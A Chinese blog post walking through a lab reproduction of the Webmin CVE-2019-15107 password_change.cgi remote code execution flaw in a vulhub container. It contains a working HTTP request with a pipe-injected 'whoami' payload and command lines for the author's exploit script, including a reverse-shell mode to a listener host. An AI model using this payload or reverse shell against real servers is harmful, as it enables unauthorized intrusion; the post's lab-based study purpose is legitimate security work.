CVE-2019-15107 Webmin RCE漏洞复现

简介: 环境搭建:进入镜像目录

一、环境搭建:

进入镜像目录:


cd vulhub/webmin/CVE-2019-15107

启动环境:


docker-compose up -d

访问:yourip:10000即可




二、漏洞描述:

该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码,由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,允许恶意第三方在缺少输入验证的情况下而执行恶意代码


影响的版本:Webmin<=1.920

漏洞利用条件:版本满足要求,且服务器的配置文件允许修改密码时,在不知道webmin的用户和密码条件下,可以任意执行代码。




三、漏洞复现:

1、首先进入容器修改root的密码:

然后用系统账号密码登陆进后台,开启修改密码功能:

vulhub默认已经设置好了:


确认配置文件:


cat /etc/webmin/miniserv.conf


2、构造payload进行RCE:






POST /password_change.cgi HTTP/1.1Host: 192.168.136.131:10000User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1X-Requested-From: webminX-Requested-From-Tab: webminX-Requested-With: XMLHttpRequestReferer: https://192.168.136.131:10000/webmin/edit_session.cgi?xnavigation=1Cookie: redirect=1; testing=1; sid=80c904aa71f996b05d4c7ec9c4260335; sessiontest=1Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 50
user=panda&old=test|whoami&new1=123456&new2=123456

执行结果:

四、漏洞EXP(自写):

脚本执行效果:

1、RCE:


python3 CVE-2019-15107.py https://192.168.136.131:10000 -f rce


2、反弹shell:


python3 CVE-2019-15107.py https://192.168.136.131:10000 -f r_shell -l 192.168.136.129 -p 7777


成功反弹shell:


脚本已经打包好了,需要的看官后台留言:webmin exp


注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!

注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!

目录
相关文章
|
监控 安全 Shell
Zabbix Server trapper 命令注入漏洞 (CVE-2017-2824)
Zabbix Server trapper 命令注入漏洞,攻击者可通过特定Payload获取服务器执行权限。
473 1
|
安全 应用服务中间件 Apache
Apache-Tomcat-Ajp文件读取漏洞(CVE-2020-1938、CNVD-2020-10487)
Apache-Tomcat-Ajp文件读取漏洞产生原因是由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件
1297 1
|
9月前
|
消息中间件 安全 Java
vulhub部分复现记录(后面大概都是原文档了,也比较难复现就不继续了)
本文介绍了多个软件的安全漏洞及其复现过程,涉及的软件包括Vulhub、Flask、ActiveMQ、Adminer、Airflow、Apache Druid、Apereo CAS、APISIX、AppWeb、Aria2、Bash、Cacti、Celery、CGI、ColdFusion和Confluence。每个部分详细描述了漏洞的背景、环境搭建步骤、漏洞复现的具体操作和验证方法。例如,Flask的SSTI漏洞通过构造特定的模板参数实现命令执行;ActiveMQ的反序列化漏洞利用特制的序列化对象触发;这些示例不仅展示了漏洞的危害性,还提供了实际的复现步骤,帮助读者深入理解这些安全问题。
1572 3
vulhub部分复现记录(后面大概都是原文档了,也比较难复现就不继续了)
|
前端开发 JavaScript Java
图书借阅管理平台|基于JavaWeb实现图书借阅系统
图书借阅管理平台|基于JavaWeb实现图书借阅系统
331 1
|
存储 Linux Android开发
Volatility3内存取证工具安装及入门在Linux下的安装教程
Volatility 是一个完全开源的工具,用于从内存 (RAM) 样本中提取数字工件。支持Windows,Linux,MaC,Android等多类型操作系统系统的内存取证。针对竞赛这块(CTF、技能大赛等)基本上都是用在Misc方向的取证题上面,很多没有听说过或者不会用这款工具的同学在打比赛的时候就很难受。以前很多赛项都是使用vol2.6都可以完成,但是由于操作系统更新,部分系统2.6已经不支持了,如:Win10 等镜像,而Volatility3是支持这些新版本操作系统的。
2115 0
|
11月前
|
安全 Cloud Native Shell
云上攻防:云原生篇&Docker容器逃逸
本文介绍了Docker的基本概念及其对渗透测试的影响,重点讲解了容器逃逸的方法。Docker是一种轻量级的容器技术,与虚拟机相比,具有更高的便携性和资源利用率。然而,这也带来了安全风险,特别是容器逃逸问题。文章详细描述了三种常见的容器逃逸方法:不安全的配置、相关程序漏洞和内核漏洞,并提供了具体的检测和利用方法。此外,还介绍了几种特定的漏洞(如CVE-2019-5736和CVE-2020-15257)及其复现步骤,帮助读者更好地理解和应对这些安全威胁。
637 0
云上攻防:云原生篇&Docker容器逃逸
|
SQL 供应链 安全
Hospital Management Startup 1.0 SQL 注入(CVE-2022-23366)
Hospital Management Startup 1.0 SQL 注入(CVE-2022-23366)
|
安全 关系型数据库 网络安全
Taogogo Taocms v3.0.2 远程代码执行(CVE-2022-25578)
Taogogo Taocms v3.0.2 远程代码执行(CVE-2022-25578)
|
自然语言处理 安全 网络安全
taoCMS v3.0.2 文件上传(CVE-2022-23880)
taoCMS v3.0.2 文件上传(CVE-2022-23880)
|
开发框架 安全 Java
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
Spring Framework存在远程代码执行漏洞,攻击者可通过该漏洞执行系统命令。
895 1
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)